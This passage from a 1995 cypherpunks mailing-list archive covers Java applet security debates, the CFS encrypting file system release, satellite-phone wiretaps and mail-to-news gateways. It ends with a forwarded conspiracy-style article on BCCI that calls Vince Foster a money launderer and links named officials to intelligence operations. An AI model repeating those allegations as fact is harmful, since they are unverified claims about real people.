protocols you want. If your browser doesn't understand how to fetch a protocol, it can fetch a protocol handler. There's no need for a kitchen sink application that understands every protocol in existence. And with HotJava, you don't NEED to automatically fetch an application and run it. You can just use it as an extension language. If someone defines a new application or protocol handler for it, and this person is fairly trusted on the net, you can decide to run it (kinda like turning off autoload images), and even review the source code first. This is no less secure than ftping software from some site and compiling it. Maybe for you, the issue is protecting corporate networks behind firewalls. That's good, well then don't let employees run HotJava. However, I look at it from the home slip/ppp'ed user standpoint. I think over the next two years, slip/ppp'ed users will displace corporate/academic users as the largest group on the net. There will be worms and viruses. Just like there are nowadays. And there will be fixes. And there will be yet another arms race between virus writers and people who write anti-virus software. No doubt, there will be HotJava based worm/virus scanners, etc. A new market will come into being. You'll make money off of fixing holes. I'll make money off custom java clients business web pages. It's the price that should be paid, that is always paid, with any new technology. I'm not advocating being careless. I'm just saying that paranoid security hampers development of more robust and better software. HotJava is a piece of low-hanging fruit. As more people use it and more problems are found, better fruit will be found. -Ray From rjc at clark.net Fri Jul 28 09:29:42 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 28 Jul 95 09:29:42 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <9507281504.AA06867@sulphur.osf.org> Message-ID: <199507281629.MAA12905@clark.net> re: OSF's mall. Ah, I misunderstood what they were trying to do from an abstract. Now it's much less exciting. They are just in effect running a beta ftp site on an http server. From perry at imsi.com Fri Jul 28 09:33:40 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 28 Jul 95 09:33:40 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <9507281615.AA23005@ua.MIT.EDU> Message-ID: <9507281633.AA27805@snark.imsi.com> solman at MIT.EDU writes: > What's with the facetious questions? Only an idiot would guarantee a piece > of software to be error free. I am highly confident that there is very > little probability of a raider applet doing significant damage. I see little reason for such confidence. > |> I like systems that are more fail-safe. About half a dozen > |> simultaneous bugs would be needed to break some of my more secure > |> firewalls, for example. Java does *not* provide security in depth. > > I think that the high level architecture of Java provides as much security > as such a product can possibly provide. Thats far from true as well. The Java interpreter could have all its I/O abilities removed, for example, rather than relying on correct implementation of the possibly correct language model to keep users from performing I/O. -- I can name lots of similar things. Having designed systems to be as secure as possible, I'd say that Java violates lots of the constraints. Its too big, too complicated, and relies for its security on the correctness of its implementation. > By the time Java becomes widely distributed (it is still in Alpha3), > I expect it to have features that deny access to any applet not > signed by somebody in a list the user creates, a sort of web of > trust. Again, this depends on the correctness of the implementation. > On top of this layer, Java already offers rudimentary > firewalls. What????? .pm From perry at imsi.com Fri Jul 28 09:37:06 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 28 Jul 95 09:37:06 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <199507281624.MAA11581@clark.net> Message-ID: <9507281636.AA28295@snark.imsi.com> Ray Cromwell writes: > Security is very nice to have. it's nice to rely on. But sometimes > there's a need for some liberty. Make everything as secure as you > can, but if security prevents you from doing something that you want > to do, it's not helping you. Yes it is. I know lots of users that would like to do certain dangerous things, but they are better off not being able to do them because if they could very likely the security problems would mean in six weeks their company would be bankrupt and they wouldn't have a job. Not all cool things are desirable things. I suspect that the java-like methodology of downloading small apps to users can be done securely, but the java model doesn't feel like the right way to do it, at least to me. Perry From rsalz at osf.org Fri Jul 28 09:54:31 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 28 Jul 95 09:54:31 PDT Subject: Java, Netscape, OpenDoc, and Babel (NewsClip) Message-ID: <9507281654.AA07397@sulphur.osf.org> >On the other hand, a Java object brokerage service sponsored by OSF OSF has no current plans to do this. From rjc at clark.net Fri Jul 28 10:03:03 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 28 Jul 95 10:03:03 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <9507281636.AA28295@snark.imsi.com> Message-ID: <199507281702.NAA22816@clark.net> > > I suspect that the java-like methodology of downloading small apps to > users can be done securely, but the java model doesn't feel like the > right way to do it, at least to me. > I agree with you. However, I think the only way to get a handle on what the security issues are of such a methodology, is to deploy one and see what happens. Then you can build a second generation environment based on that knowledge. There's also the issue that even if the environment is secure on paper, with an application as large as a browser and an execution environment, you can never know if it was implemented properly. Sendmail-like bugs could haunt the system for years. That's why its good to deploy it early, fix all the big holes discovered as fast as possible. At minimum though, I think Java should atleast run chroot()ed on Unix systems. Instead, their approach is to define a "writable" directory on disk that apps can write too. This does make me nervous because I can see the potential to send over a program to be compiled and executed. I don't know what you would do under the MacOS and Win95 to make it secure. There is also security at the meta-applet level. Even if you chroot() Java to some directory where applets can write to, one applet can destroy another's data. If the data saved by one applet is valuable to you, like hotlist settings gathered over months, a rogue applet can trash them. But sometimes applets need to be able to read/write each others data so you can't just disallow it. So HotJava should have a access protocol for applets too. The Java team could learn a lot from the experience LambdaMOO. -Ray From adam at bwh.harvard.edu Fri Jul 28 10:17:48 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Fri, 28 Jul 95 10:17:48 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <199507281624.MAA11581@clark.net> Message-ID: <9507281717.AA09190@leonardo.bwh.harvard.edu> Ray writes: | Object Oriented Superdistributed components are so useful an abstraction, | I think it's worth the security risk. HotJava solves some fundamental | issues with protocols. Right now the W^3 working groups have been struggling Its nice of you to say that. Its nice of Perry to disagree. Lets start using some concrete examples, so the source of disagreements become obvious? I suspect Ray is working in an environment less security concious than Perry's. Perry works on a lot of security-critical applications where a lot of money is at stake. If I were going to go after financial institutions, I'd definetly look at which ones were using Java, and see what I could upload into their systems. Getting copies of the recent files might be *very* informative. I'd be worried if I were at Solomon brothers. If I were running Java at home, I'd be a lot less worried, especially as all the interesting data on my hard drive sits on an encrypted partition. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From mab at research.att.com Fri Jul 28 10:17:52 1995 From: mab at research.att.com (Matt Blaze) Date: Fri, 28 Jul 95 10:17:52 PDT Subject: New release (v1.3) of CFS Unix encrypting file system now available Message-ID: <9507281720.AA03779@merckx.info.att.com> Source code for the latest version (release 1.3) of CFS, the Cryptographic File System, is now available upon request for research and experimental use in the US and Canada. CFS pushes encryption services into the Unix(tm) file system. It supports secure storage at the system level through a standard Unix file system interface to encrypted files. Users associate a cryptographic key with the directories they wish to protect. Files in these directories (as well as their pathname components) are transparently encrypted and decrypted with the specified key without further user intervention; cleartext is never stored on a disk or sent to a remote file server. CFS employs a novel combination of DES stream and codebook cipher modes to provide high security with good performance on a modern workstation. CFS can use any available file system for its underlying storage without modification, including remote file servers such as NFS. System management functions, such as file backup, work in a normal manner and without knowledge of the key. CFS runs under SunOS and several other BSD-derived systems with NFS. It is implemented entirely at user level, as a local NFS server running on the client machine's "loopback" interface. It consists of about 5000 lines of code and supporting documentation. You must have "root" access to install CFS. CFS was first mentioned at the work-in-progress session at the Winter '93 USENIX Conference and was more fully detailed in: Matt Blaze. "A Cryptographic File System for Unix", Proc. 1st ACM Conference on Computer and Communications Security, Fairfax, VA, November 1993. (PostScript available by anonymous ftp from research.att.com in the file dist/mab/cfs.ps.) and in Matt Blaze. "Key Management in an Encrypting File System", Proc. Summer '94 USENIX Tech. Conference, Boston, MA, June 1994. (PostScript available by anonymous ftp from research.att.com in the file dist/mab/cfskey.ps.) Version 1.3 of CFS also includes ESM, the Encrypting Session Manager. ESM provides shell-to-shell encrypted sessions across insecure links and requires no OS or network support. It is useful for typing cfs passphrases when logged in over the network. ESM needs RSAREF 2.0 to compile and is tested only on SunOS and BSDI. ESM is the first released part of a suite of session encryption tools that are described in Matt Blaze and Steve Bellovin. "Session-layer Encryption." Proc. 1995 USENIX Security Workshop, Salt Lake City, June 1995. (PostScript is available from ftp://research.att.com/dist/mab/sesscrypt.ps) The new version of CFS differs from the version described in the papers in a few ways: * The DES-based encryption scheme has been strengthened, and now provides greater security but with the online latency of only single-DES. * Support for the smartcard-based key management system is not included and a few of the tools are not included. * An impoved key management scheme now allows chaning the passphrase associated with a directory. * The performance has been improved. * The security of the system against certain non-cryptanalytic attacks has been improved somewhat. * User-contributed ports to a number of additional platforms. * Hooks for adding new ciphers. * 3-DES and MacGuffin encryption options. * Timeout options allow automatic detach of encrypted directories after a set time or period of inactivity. CFS is distributed as a research prototype; it is COMPLETELY UNSUPPORTED software. No warranty of any kind is provided. We will not be responsible if the system deletes all your files and emails the cleartext directly to the NSA or your mother. Also, we do not have the resources to port the software to other platforms, although you are welcome to do this yourself. The software was developed under SunOS and BSDI, and there are also unsupported user-contributed ports available for AIX, HP/UX, Irix, Linux, Solaris and Ultrix. We really can't promise to provide any technical support at all, beyond the source code itself. We also maintain a mailing list for CFS users and developers; subscription information is included with the source code. Because of export restrictions on cryptographic software, we are only able to make the software available within the US and Canada to US and Canadian citizens and permanent residents. Unfortunately, we cannot make it available for general anonymous ftp or other uncontrolled access, nor can we allow others to do so. Sorry. Legal stuff from the README file: * Copyright (c) 1992, 1993, 1994 by AT&T. * Permission to use, copy, and modify this software without fee * is hereby granted, provided that this entire notice is included in * all copies of any software which is or includes a copy or * modification of this software and in all copies of the supporting * documentation for such software. * * This software is subject to United States export controls. You may * not export it, in whole or in part, or cause or allow such export, * through act or omission, without prior authorization from the United * States government and written permission from AT&T. In particular, * you may not make any part of this software available for general or * unrestricted distribution to others, nor may you disclose this software * to persons other than citizens and permanent residents of the United * States and Canada. * * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED * WARRANTY. IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE. If you would like a copy of the CFS source code, please read to the end of this message and then send email to: cfs at research.att.com DO NOT REPLY DIRECTLY TO THIS MESSAGE. You must include a statement that you are in the US or Canada, are a citizen or legal permanent resident of the US or Canada, and have read and understand the license conditions stated above. Be sure to include an email address in a US- or Canada-registered domain. The code will be sent to you via email in a "shar" shell archive (a little over 300K bytes long). From perry at imsi.com Fri Jul 28 10:25:56 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 28 Jul 95 10:25:56 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <9507281717.AA09190@leonardo.bwh.harvard.edu> Message-ID: <9507281725.AA05535@snark.imsi.com> Adam Shostack writes: > If I were running Java at home, I'd be a lot less worried, > especially as all the interesting data on my hard drive sits on an > encrypted partition. Not everyone is so careful. To most people, their personal financial information, especially if it allows embezzlement from their accounts, is probably as valuable to them as a banks's information is to them... .pm From bdavis at thepoint.net Fri Jul 28 10:40:26 1995 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 28 Jul 95 10:40:26 PDT Subject: Sat phone permit "wire"taps In-Reply-To: <199507272254.AA06257@tyrell.net> Message-ID: On Thu, 27 Jul 1995, Phil Fraering wrote: > From: Ted_Anderson at transarc.com > > I found these paragraphs in a recent Space News interesting. They were > at the end of an article titled "Military Officials Open To Using > ^^^^^^^^^^^^^^^ > Civilian Links" in the July 3rd issue. > > [...] > "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include > features to permit authorized eavesdropping, officials said. ^^^^^^^^^^ Did you miss this word? While I suspect that you don't like Title III wiretaps, they are legal at present. The above contemplates legal wiretaps on some phone service that might otherwise be outside the reach of legal wiretaps. > Hmm. Anyone here ever heard of the Walkers, or the Rosenbergs? > > It's a pity that the military has decided that in its zeal to listen > in on phone calls, that national security is an expendable asset. The military is not authorized to listen in to any phone calls they want to hear. Otherwise, everyone on the list, including me, would probably be in some hidden military prison. :-) for the humor-impaired. > It looks like the Chinese or Russian Armies won't be any better by > the time they're occupying us, unfortunately. > > (The really awful part is that what friends I have that are current > or past U.S. military don't want to die, AFAIK). > > Phil > EBD From rjc at clark.net Fri Jul 28 10:54:29 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 28 Jul 95 10:54:29 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <9507281717.AA09190@leonardo.bwh.harvard.edu> Message-ID: <199507281754.NAA11499@clark.net> > > Ray writes: > > | Object Oriented Superdistributed components are so useful an abstraction, > | I think it's worth the security risk. HotJava solves some fundamental > | issues with protocols. Right now the W^3 working groups have been struggling > > Its nice of you to say that. Its nice of Perry to disagree. > Lets start using some concrete examples, so the source of > disagreements become obvious? > > I suspect Ray is working in an environment less security > concious than Perry's. Perry works on a lot of security-critical > applications where a lot of money is at stake. If I were going to go > after financial institutions, I'd definetly look at which ones were > using Java, and see what I could upload into their systems. Getting > copies of the recent files might be *very* informative. I'd be > worried if I were at Solomon brothers. If a business wants high security, they probably shouldn't be running anything but mail. Even allowing users ftp access is dangerous because someone could download a trojan horse. My college took the /exec function out of IRC for this very reason. If data can get through a firewall by any means, DNS, mail, etc, it's possible to write some kind of program to send stolen information on those channels. Hell, there is a big enough problem with users bringing software from home into work and infecting company networks with viruses. I work in an environment which is very security conscious (IBM Watson Research). You should see how paranoid their virus lab setup is. And I'm frustrated by not being able to run stuff from work I run at home because of the firewall. I probably shouldn't be running the stuff at work anyway, but I can't pass up having access to a T1/T3 net connection on my desk. I have no problem with security, as long as it is user friendly. If everyone had to manually run PGP from the shell to post a message to cypherpunks, would there be many posts? At home however, I have full control over my environment. I don't avoid all potentially dangerous software, because for me, the benefits outweigh the risks. I have never seen the source code to DOOM's internet drivers, so I have no way of knowing if data is being stolen or downloaded to my harddrive. I would rather choose to encrypt the harddrive, and run the software in an alternate partition even though this still doesn't guarantee safety. I know people who go farther such as swapping HD's in-and-out depending on whether they are in "fun, experimental computer use mode", or "serious, money risking mode" But ultimately that decision is up to me. Most of the people who will be running HotJava are users in non-corporate environments. Once you actually browse some HotJava web pages with HotJava, the ordinary Web becomes static and boring. It's like the difference between ftp and Netscape, or TinyMUD and LambdaMOO. There's just so much potential, especially for crypto-clients. Because Java provides a single development platform, single execution environment, GUI, and network access. -Ray From adam at bwh.harvard.edu Fri Jul 28 12:41:57 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Fri, 28 Jul 95 12:41:57 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <199507281754.NAA11499@clark.net> Message-ID: <9507281941.AA10821@leonardo.bwh.harvard.edu> Ray wrote, responding to me: | > I suspect Ray is working in an environment less security | > concious than Perry's. Perry works on a lot of security-critical | > applications where a lot of money is at stake. If I were going to go | > after financial institutions, I'd definetly look at which ones were | > using Java, and see what I could upload into their systems. Getting | > copies of the recent files might be *very* informative. I'd be | > worried if I were at Solomon brothers. | If a business wants high security, they probably shouldn't be running | anything but mail. Even allowing users ftp access is dangerous | because someone could download a trojan horse. My college took | the /exec function out of IRC for this very reason. If data can | get through a firewall by any means, DNS, mail, etc, it's possible to write | some kind of program to send stolen information on those channels. Hell, | there is a big enough problem with users bringing software from home | into work and infecting company networks with viruses. FTP is available by mail. So is web access. Marcus Ranum (formerly of TIS) has written a TCP/IP over SMTP. (He doesn't distribute it.) The problem of securing a network in this environment is a very difficult one. Parts of it can be shown to be hard, although partial solutions are possible. I suspect the risks are enhanced by easy to use clients, as is the productivity of the workers. Many experts recommend studying each service and deciding whether or not to allow it based on a risk assesment. The size of Java makes it tough to evaluate, as does its extensible nature. I'm tempted to agree with Perry that its too big and doesn't have enough fail-safes yet. I'd be much happier if the Java execution environment did a chroot() before running any code, and code went to the executor through a one way funnel. Making this funnel truely one way limits the nifty things you can do with Java substantially. | Once you actually browse some HotJava web pages with HotJava, the | ordinary Web becomes static and boring. It's like the difference between | ftp and Netscape, or TinyMUD and LambdaMOO. There's just so much | potential, especially for crypto-clients. Because Java provides a | single development platform, single execution environment, GUI, and | network access. No argument here. I think Java is way nifty, and might be enough of a killer app for me to upgrade to a powerPC mac. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From pgf at tyrell.net Fri Jul 28 13:07:53 1995 From: pgf at tyrell.net (Phil Fraering) Date: Fri, 28 Jul 95 13:07:53 PDT Subject: Java, Netscape, OpenDoc, and Babel In-Reply-To: <9507281410.AA07271@snark.imsi.com> Message-ID: <199507282003.AA24860@tyrell.net> Reply-To: perry at piermont.com X-Reposting-Policy: redistribute only with permission Date: Fri, 28 Jul 1995 10:10:59 -0400 From: "Perry E. Metzger" ... I exagerate only slightly. I don't believe Java to be secure, in spite of the claims. Its too complicated, and it operates in an environment who's correct operation is required for it to remain secure. Good system design says that you want a system's failure mode to produce a secure result, but thats not what Java does. Perry How would you make Java secure or create a secure Javalike language? (Secure to your satisfaction, of course). I don't even play a security consultant on TV, but would removing hooks into X-windows (if it has them; I don't know if it does, although Ray mentioned something about how it could open multiple windows with graphics in them, I think) be a good start? What sort of interface does it have to the filesystem? I would guess that a secure language would have its own filesystem mapped to a file of fixed size in the normal filesystem, so that it couldn't cause disaster by filling your hard disk. Does it have that? Phil From pgf at tyrell.net Fri Jul 28 13:24:37 1995 From: pgf at tyrell.net (Phil Fraering) Date: Fri, 28 Jul 95 13:24:37 PDT Subject: Sat phone permit "wire"taps In-Reply-To: Message-ID: <199507282019.AA27619@tyrell.net> Date: Fri, 28 Jul 1995 13:42:46 -0400 (EDT) From: Brian Davis Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII On Thu, 27 Jul 1995, Phil Fraering wrote: > From: Ted_Anderson at transarc.com > > I found these paragraphs in a recent Space News interesting. They were > at the end of an article titled "Military Officials Open To Using > ^^^^^^^^^^^^^^^ > Civilian Links" in the July 3rd issue. > > [...] > "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include > features to permit authorized eavesdropping, officials said. ^^^^^^^^^^ Did you miss this word? While I suspect that you don't like Title III wiretaps, they are legal at present. The above contemplates legal wiretaps on some phone service that might otherwise be outside the reach of legal wiretaps. You misunderstand. With public key encryption, the proliferation of processor power and bandwidth, and their funding, there is NO reason whatsoever for the MILITARY to use an intentionally WEAK encryption system. > Hmm. Anyone here ever heard of the Walkers, or the Rosenbergs? > > It's a pity that the military has decided that in its zeal to listen > in on phone calls, that national security is an expendable asset. The military is not authorized to listen in to any phone calls they want to hear. Otherwise, everyone on the list, including me, would probably be in some hidden military prison. :-) for the humor-impaired. I think you misunderstood: if we want a military in the first place (yes, I realize that's an open question to many people on this list) it needs to have as much of its communications encrypted as possible. Without back doors or intentionally weakened algorithms. Otherwise we're just stuck with a standard conventional force that isn't _that_ great compared to the combined assets of a reasonable assembly of enemy forces. I would go even farther: since so many of the troops sent over to the Gulf in the war there went with K-Mart-purchased GPS receivers that the military had to turn off selective availability, I am willing to bet that in future conflicts the U.S. soldier's ability to have secure communications (with no backdoors or weakened algorithms) is dependent on civilians having access to the same technology. Because the only way they might have it is if Ma and Pa go down to the local K-Mart and buy one for their son/daughter about to go overseas. (I could add some stuff about GPS vs. Geostar, but I figured I've wasted enough bandwidth already). Phil From kdf at gigo.com Fri Jul 28 14:16:03 1995 From: kdf at gigo.com (John Erland) Date: Fri, 28 Jul 95 14:16:03 PDT Subject: Mail2news Gates Message-ID: <1ef_9507281405@gigo.com> [Please respond via netmail - I have only intermittant access to list] Can someone send me a list of functioning mail-2-news gates? Suddenly, @news.demon.co.uk, which has worked well for ages, is rejecting posts: =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++=+=+=+=+=+=+ Subject: Article rejected Date: Fri, 28 Jul 95 1:36:41 +0100 Sender: news at dispatch.demon.co.uk You do not have posting privileges via this mail2news gateway. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++=+=+=+=+=+=+ This is troubling, as I have not found another gate that carries my regional heirarchy. Also, is there a method by which one can access (via netmail) a list of the newsgroups served by a given mail-2-news gate? Thanks for any help. -- : Fidonet: John Erland 1:203/8055.12 .. speaking for only myself. : Internet: kdf at gigo.com From bdolan at use.usit.net Fri Jul 28 14:27:15 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Fri, 28 Jul 95 14:27:15 PDT Subject: now! Grabbe, X, re. Foster, NSA, BCCI, etc. Message-ID: ---------- Forwarded message ---------- Date: Fri, 28 Jul 1995 15:49:28 -0400 (EDT) From: KALLISTE at delphi.com To: bdolan at use.usit.net Subject: Part X: Allegations re Vince Foster, the NSA, and Bank Spying -----BEGIN PGP SIGNED MESSAGE----- Allegations Regarding Vince Foster, the NSA, and Banking Transactions Spying, Part X by J. Orlin Grabbe ********************************************************************* * * I received a call from Mr. Stephen Ganis, counsel to the House * * Committee on Banking and Financial Services, who assures me that * * he did NOT provide Jim Norman's article to Mr. Charles O. Morgan, * * attorney for Alltel Information Services, but rather called Mr. * * Morgan *after* the *Media Bypass* article had appeared, to get * * Morgan's side of things. Mr. Morgan was apparently not aware * * that the article had been published, and that was the only * * information he received from Mr. Ganis. Mr. Ganis assures me * * that his group is NOT passing any information to Alltel, but is * * in fact carefully keeping all sources and information confidential. * * *********************************************************************** What do nuclear weapons, money laundering, covert operations, money management, clandestine payments of payola and kickbacks, and the systematic monitoring of bank loans and bank wire transfers have in common? The answer begins with BCCI: the Bank of Credit and Commerce International. BCCI connects the Israeli bomb to the Pakistani bomb to suppliers of banking software like Systematics, and to a very dead money launderer named Vince Foster. Don't misunderstand the latter statement: I believe we should all have the right to "launder" money. The money-laundering laws are a frightening, Big-Brotherly intrusion into financial privacy (see J. Orlin Grabbe, "The End of Ordinary Money, Part II: Money Laundering, Electronic Cash, and Cryptological Anonymity"). But why is there one standard of legislated "morality" that applies, say, to a LEADING OFFICIAL OF THE FEDERAL RESERVE SYSTEM, and another standard that applies to everyone else? In 1972 Pakistani banks were nationalized by President Bhutto. One of these banks was United Bank, whose president was Agha Hasan Abedi. Abedi subsequently joined with Sheik Zayad, ruler of Abu Dhabi and patron of the PLO, to found BCCI. To prevent nationalization, BCCI was chartered in Luxembourg. In 1975 it split into two entities, one remaining in Luxembourg and the other established in the Cayman Islands. The Cayman Islands part became a "bank within a bank." While the legal registration was in Luxembourg and the Cayman Islands, the actual operational head- quarters was moved to London. In 1976 John Heimann, New York superintendent of banking, turned down BCCI's attempt to buy Chelsea National Bank in New York. (Shareholders in the bank included former Mayor Robert Wagner and the Finley, Kumble law firm.) The actual purchase attempt was made by one of the Gokal brothers of shipping fame, Abbas Gokal, using a loan from his sister. Banking experience was to be provided by BCCI, but Heimann refused to approve the purchase, despite several meetings with Abedi. Abedi realized that BCCI would not be able to enter the U.S. market under its own name. Abedi's attention was then brought to bear on Financial General, a Washington D.C.-based bank with headquarters a block from the White House. The bank had been acquired in April 1977 by an investor group lead by William Middendorf II, who was Secretary of the Navy under Nixon and Ford. One member of the investor group was Jackson Stephens. Stephens then send salemen from his Little Rock firm *Systematics* to talk to Middendorf about providing banking software for Financial General, but they were firmly rejected. Stephens decided to wrest control of the bank from Middendorf. Jackson Stephens is a billionaire from Little Rock who owns the controlling interest in Worthen National Bank as well as in Stephens Inc., one of the largest privately owned investment banks outside Wall Street. In November 1977, he introduced BCCI-founder Abedi to Bert Lance, Carter's Director of the Office of Management and Budget, whom Stephens had met through Jimmy Carter, his old roommate from Naval Academy days. (Lance and Stephens, two Southern Baptists, had hit it off.) Lance also knew the people at Financial General, for it was Financial General that had sold to Lance controlling interest in the National Bank of Georgia in 1975. Abedi in turn introduced Lance to Stanford-and-Harvard-(and Colorado School of Mines)-educated Ghaith Pharaon. Pharaon proceeded to acquire the stock of Bert Lance's National Bank of Georgia, a deal consummated on January 5, 1978, a day after Lance's $3.4 million loan from the First National Bank of Chicago was repaid by BCCI London. Pharaon was apparently acting on behalf of Abedi in the acquisition, at least in part. By then Lance had left the Carter administration, and he and Jackson Stephens joined together to help BCCI take over Financial General. A Financial General lawsuit filed on February 17 named "Bert Lance, Bank of Credit & Commerce International, Agha Hasan Abedi, Eugene J. Metzger, Jackson Stephens, Stephens Inc., Systematics Inc. and John Does numbers 1 through 25." Systematics was represented by C.J. Giroir, Webster Hubbell, and Hillary Rodham Clinton of the Rose Law Firm of Little Rock: "The suit was ultimately settled, but intriguingly, briefs for Systematics, a Stephens property, were submitted by a trio of lawyers including C.J. Giroir and Webster L. Hubbell and signed by Hillary Rodham" ("Who is Jack Ryan?" *The Wall Street Journal*, August 1, 1994). This BCCI-Lance-Stephens-Systematics-Hubbell-Clinton connection will continue to reappear in our story. Edwin McAmis, an attorney for Financial General, deposed Lance in connection with the stockholder civil suit, and turned up a mysterious loan: "The loan could have been for as much as $3.4 million . . . and came from London's Bank of Credit & Commerce International, on whose behalf Lance had approached Financial General with a bid for control. . . . Lance said he used it last January to pay off his celebrated $3.4 million loan from the First National Bank of Chicago . . . The latest loan, he said was arranged by Agha Hassan Abedi, an energetic Pakistani who heads B.C.C.I. "Collateral? None. "Documents? Well, no, though Lance's lawyer, Robert Altman, says some are being drawn up now." (quoted from "Another 'Loan' for Lance," *Time*, April 3, 1978.) Bert Lance had approached Financial General on behalf of BCCI London with a bid for control of the bank. Lance was also was responsible for introducing BCCI founder Abedi to Jimmy Carter, and for bringing Clark Clifford in on the take-over attempt. Ghaith Pharaon was another investor in the deal. Also involved in the successful BCCI takeover were Clark Clifford (the former Defense Secretary under Johnson and lawyer for BCCI), Robert Altman (attorney for Bert Lance and Clifford's partner), and Kamal Adham (the former head of Saudi Arabian intelligence who was King Faisal's most trusted advisor, and whose half-sister Iffat was King Faisal's favorite wife). Kamal Adham and Ghaith Pharaon had built the Hyatt hotel in Riyad, and Adham had originally introduced Pharaon to Abedi. Adham and Pharaon (along with Faisal al-Fulaij and Abdullah Darwaish) owned KIFCO, the Kuwaiti International Finance Company (James Ring Adams & Douglas Frantz, *A Full Service Bank: How BCCI Stole Billions Around the World*, Pocket Books, 1992, p. 52). In a lawsuit filed March 18, 1978, the Securities and Exchange Commission charged Lance with violations of federal security laws, and BCCI's application to purchase Financial General Bankshares was denied. Abedi then formed a new takeover vehicle, Credit and Commerce American Holdings (CCAH), based in the Netherlands Antilles. The largest investor in CCAH was Kamal Adham, who put up $13 million of his own money On October 19, 1978, CCAH filed for approval with the Federal Reserve to purchase Financial General. This application was dismissed on February 16, 1979, due to opposition from Financial General's Maryland subsidiary, but a new application was submitted later. The Federal Reserve finally approved the purchase in on April 19, 1982, and BCCI renamed the bank "First American" three months later. Clark Clifford was made chairman and Robert Altman president. The head of Bank Supervision at the Federal Reserve when BCCI's purchase was approved was Jack Ryan, who later became head of the Resolution Trust Corporation, in which role he denied Rep. Leach's requests for documents related to Madison Guaranty, the Whitewater thrift. What was the point of BCCI's takeover of First American? " 'They wanted an important stake across the street from the White House,' says one Washington banking executive, adding, 'Some people might think it is important to know about the outstanding loans and balances of Government officials'" (*Time*). Abedi used his new-found connections to Jimmy Carter to publicize BCCI to heads of state around the world. Abedi made his personal 727 jet available to Carter, and accompanied the former President to Thailand, Tibet, Hong Kong, and the Soviet Union, among other places. Carter introduced Abedi to many heads of state, from Den Xiaoping in China to James Callahan in the U.K. Abedi donated a half million dollars to establish the Carter presidential library, and a public policy institute at Emory university. In the meantime BCCI founder Abedi was committed to the development of an *Islamic atomic bomb*, even donating 500 million rupees for the creation of Pakistan's Gulam Ishaq Research Institute for nuclear development. BCCI was in some sense seen by Abedi as the financial competitor to the "committee of 30" that worked on behalf of Israel. (According to Israeli correspondents Tzadok Yehezkeli and Danny Sadeh: "Israel solicits money from wealthy Jews from all over the world for financing its nuclear weaponry programs. This fundraising drive is directed by a committee comprised of 30 Jewish millionaires" [review of book *Critical Mass* in *Yediot Ahronot*, January 30, 1994].) But while BCCI founder Abedi had intended BCCI to finance the development of a Pakistani nuclear bomb, this effort was compromised at the start by the presence of Kamal Adham, who through CCAH was the controlling power behind First American, and who had asked Clark Clifford to head up the bank. For Adham was both a CIA and a Mossad asset. Adham, in addition to being Faisal's most trusted advisor and the former head of Saudi intelligence, had attended CIA training school with the head of the Mossad. "Kamal Adham, who was the CIA's principal liason for the entire Middle East from the mid-1960's through 1979, was the lead frontman for BCCI in its takeover of First American, was an important nominee shareholder in BCCI, and remains one of the key players in the entire BCCI affair" (Senator John Kerry and Senator Hank Brown, *The BCCI Affair: a Report to the Committee on Foreign Relations, United States Senate*, December 1992). Perhaps that is why Pakistani's efforts to develop their own nuclear bomb met with repeated compromises, such as the following: "In 1983 a Dutch court convicted Dr. Abdul Qader Khan, head of Pakistan's nuclear program, on charges of stealing the blueprints for a uranium enrichment factory. . . . Kahn's lawyer was paid by BCCI. "In 1984, three Pakistani nationals were indicted in Houston for attempting to buy and ship to Pakistan, high-speed switches designed to trigger nuclear weapons. The trio offered to pay in gold supplied by BCCI. "In 1987 two Americans, Rita and Arnold Mandel, together with Hong Kong businessman Leung Yu Hung, were indicted by the U.S. Attorney in Sacramento, California, on charges of illegal importations of $1 billion worth of oscilloscopes and computer equipment for Pakistan's nuclear program. . . . BCCI facilitated [some of the shipments]" "In 1987 in Philadelphia, Ashad Pervez, a Pakistani-born Canadian, was indicted for conspiring to export restricted specialty steel and metal used to enhance nuclear explosions. ... He . . . paid high prices with money delivered to the Toronto BCCI branch from BCCI London" (Rachel Ehrenfeld, *Evil Money*, HarperCollins, 1992). BCCI became a important conduit for CIA intelligence, and also a ready target for the tenacles of the NSA. When Norman Bailey at the National Security Council urged NSA to "follow the money" as part of the "wars" on terrorism and drugs, the NSA had BCCI as one obvious banking target. The CIA was there also to assist in the monitoring of BCCI-related money flows of other intelligence and criminal enterprises. For BCCI had become a giant laundry machine, and the CIA made use of BCCI for their own covert money transfers. One example involves Manuel Noriega, who was recruited by the U.S. Defense Intelligence Agency in 1959, who went on the CIA payroll in 1967, and who became head of Panamanian military intelligence in 1968, where he was in a strategic position to supply both information and drugs to the United States, and later on arms to the contras in an operation 